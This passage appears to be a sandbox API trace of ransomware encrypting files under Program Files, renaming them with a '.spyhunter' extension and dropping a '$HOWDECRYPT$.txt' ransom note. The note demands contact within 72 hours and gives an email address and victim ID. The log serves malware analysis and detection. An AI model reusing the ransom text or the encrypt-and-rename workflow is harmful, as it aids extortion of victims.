(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0093.069] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fd14, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fd14*=0x2ac, lpOverlapped=0x0) returned 1 [0093.070] CloseHandle (hObject=0x178) returned 1 [0093.070] GetProcessHeap () returned 0x2c0000 [0093.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34eab8 | out: hHeap=0x2c0000) returned 1 [0093.070] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fcb0 | out: pbBuffer=0x57fcb0) returned 1 [0093.070] GetProcessHeap () returned 0x2c0000 [0093.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.070] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fca8*=0x30) returned 1 [0093.071] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\wt61fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0093.071] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX") returned 75 [0093.072] StrStrW (lpFirst="WT61FR.LEX", lpSrch=".txt") returned 0x0 [0093.072] GetProcessHeap () returned 0x2c0000 [0093.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c26128 [0093.072] ReadFile (in: hFile=0x178, lpBuffer=0x2c26128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fc6c, lpOverlapped=0x0 | out: lpBuffer=0x2c26128*, lpNumberOfBytesRead=0x57fc6c*=0x2800, lpOverlapped=0x0) returned 1 [0093.094] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.094] WriteFile (in: hFile=0x178, lpBuffer=0x2c26128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fc6c, lpOverlapped=0x0 | out: lpBuffer=0x2c26128*, lpNumberOfBytesWritten=0x57fc6c*=0x2800, lpOverlapped=0x0) returned 1 [0093.094] GetProcessHeap () returned 0x2c0000 [0093.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c26128 | out: hHeap=0x2c0000) returned 1 [0093.094] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.094] WriteFile (in: hFile=0x178, lpBuffer=0x57fcac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fc6c, lpOverlapped=0x0 | out: lpBuffer=0x57fcac*, lpNumberOfBytesWritten=0x57fc6c*=0x4, lpOverlapped=0x0) returned 1 [0093.111] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fc6c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fc6c*=0x30, lpOverlapped=0x0) returned 1 [0093.111] CloseHandle (hObject=0x178) returned 1 [0093.141] GetProcessHeap () returned 0x2c0000 [0093.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0093.141] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX.spyhunter") returned 85 [0093.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\wt61fr.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\wt61fr.lex.spyhunter")) returned 1 [0093.143] GetProcessHeap () returned 0x2c0000 [0093.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0093.143] GetProcessHeap () returned 0x2c0000 [0093.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.143] GetProcessHeap () returned 0x2c0000 [0093.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346488 | out: hHeap=0x2c0000) returned 1 [0093.144] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0093.145] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0093.145] WriteFile (in: hFile=0x178, lpBuffer=0x57fbe3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fd0c, lpOverlapped=0x0 | out: lpBuffer=0x57fbe3*, lpNumberOfBytesWritten=0x57fd0c*=0x127, lpOverlapped=0x0) returned 1 [0093.146] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0093.146] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fd0c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fd0c*=0x2ac, lpOverlapped=0x0) returned 1 [0093.147] CloseHandle (hObject=0x178) returned 1 [0093.147] GetProcessHeap () returned 0x2c0000 [0093.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f148 | out: hHeap=0x2c0000) returned 1 [0093.147] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fca8 | out: pbBuffer=0x57fca8) returned 1 [0093.147] GetProcessHeap () returned 0x2c0000 [0093.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.147] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fca0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fca0*=0x30) returned 1 [0093.147] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitevignette1047.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.148] GetProcessHeap () returned 0x2c0000 [0093.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.148] GetProcessHeap () returned 0x2c0000 [0093.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3553b0 | out: hHeap=0x2c0000) returned 1 [0093.149] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fca8 | out: pbBuffer=0x57fca8) returned 1 [0093.149] GetProcessHeap () returned 0x2c0000 [0093.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.149] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fca0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fca0*=0x30) returned 1 [0093.149] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitemask1047.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.149] GetProcessHeap () returned 0x2c0000 [0093.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.149] GetProcessHeap () returned 0x2c0000 [0093.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ee78 | out: hHeap=0x2c0000) returned 1 [0093.149] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fca0 | out: pbBuffer=0x57fca0) returned 1 [0093.149] GetProcessHeap () returned 0x2c0000 [0093.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.149] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc98*=0x30) returned 1 [0093.149] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialoccasion.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.149] GetProcessHeap () returned 0x2c0000 [0093.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.150] GetProcessHeap () returned 0x2c0000 [0093.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f238 | out: hHeap=0x2c0000) returned 1 [0093.150] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fca0 | out: pbBuffer=0x57fca0) returned 1 [0093.150] GetProcessHeap () returned 0x2c0000 [0093.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.150] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc98*=0x30) returned 1 [0093.150] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.150] GetProcessHeap () returned 0x2c0000 [0093.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.150] GetProcessHeap () returned 0x2c0000 [0093.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3509d8 | out: hHeap=0x2c0000) returned 1 [0093.150] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc98 | out: pbBuffer=0x57fc98) returned 1 [0093.150] GetProcessHeap () returned 0x2c0000 [0093.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.150] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc90*=0x30) returned 1 [0093.150] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.171] GetProcessHeap () returned 0x2c0000 [0093.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.171] GetProcessHeap () returned 0x2c0000 [0093.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3508c0 | out: hHeap=0x2c0000) returned 1 [0093.171] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0093.174] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0093.174] WriteFile (in: hFile=0x178, lpBuffer=0x57fbcb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fcf4, lpOverlapped=0x0 | out: lpBuffer=0x57fbcb*, lpNumberOfBytesWritten=0x57fcf4*=0x127, lpOverlapped=0x0) returned 1 [0093.175] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0093.175] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fcf4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fcf4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.175] CloseHandle (hObject=0x178) returned 1 [0093.176] GetProcessHeap () returned 0x2c0000 [0093.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e200 | out: hHeap=0x2c0000) returned 1 [0093.196] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0093.199] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0093.199] WriteFile (in: hFile=0x178, lpBuffer=0x57fbc7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fcf0, lpOverlapped=0x0 | out: lpBuffer=0x57fbc7*, lpNumberOfBytesWritten=0x57fcf0*=0x127, lpOverlapped=0x0) returned 1 [0093.200] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0093.200] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fcf0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fcf0*=0x2ac, lpOverlapped=0x0) returned 1 [0093.200] CloseHandle (hObject=0x178) returned 1 [0093.200] GetProcessHeap () returned 0x2c0000 [0093.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346c68 | out: hHeap=0x2c0000) returned 1 [0093.200] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc90 | out: pbBuffer=0x57fc90) returned 1 [0093.200] GetProcessHeap () returned 0x2c0000 [0093.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.201] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc88*=0x30) returned 1 [0093.201] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\photograph.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.202] GetProcessHeap () returned 0x2c0000 [0093.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.202] GetProcessHeap () returned 0x2c0000 [0093.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e7e8 | out: hHeap=0x2c0000) returned 1 [0093.202] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc88 | out: pbBuffer=0x57fc88) returned 1 [0093.202] GetProcessHeap () returned 0x2c0000 [0093.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.202] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc80*=0x30) returned 1 [0093.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.203] GetProcessHeap () returned 0x2c0000 [0093.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.203] GetProcessHeap () returned 0x2c0000 [0093.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381da8 | out: hHeap=0x2c0000) returned 1 [0093.203] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc88 | out: pbBuffer=0x57fc88) returned 1 [0093.203] GetProcessHeap () returned 0x2c0000 [0093.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.203] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc80*=0x30) returned 1 [0093.203] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.203] GetProcessHeap () returned 0x2c0000 [0093.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.203] GetProcessHeap () returned 0x2c0000 [0093.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355980 | out: hHeap=0x2c0000) returned 1 [0093.203] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc80 | out: pbBuffer=0x57fc80) returned 1 [0093.203] GetProcessHeap () returned 0x2c0000 [0093.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.204] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc78*=0x30) returned 1 [0093.204] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.204] GetProcessHeap () returned 0x2c0000 [0093.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.204] GetProcessHeap () returned 0x2c0000 [0093.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3508c0 | out: hHeap=0x2c0000) returned 1 [0093.204] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc80 | out: pbBuffer=0x57fc80) returned 1 [0093.204] GetProcessHeap () returned 0x2c0000 [0093.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.204] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc78*=0x30) returned 1 [0093.204] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.204] GetProcessHeap () returned 0x2c0000 [0093.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.204] GetProcessHeap () returned 0x2c0000 [0093.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a760 | out: hHeap=0x2c0000) returned 1 [0093.205] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc78 | out: pbBuffer=0x57fc78) returned 1 [0093.205] GetProcessHeap () returned 0x2c0000 [0093.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.205] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc70*=0x20, dwBufLen=0x30 | out: 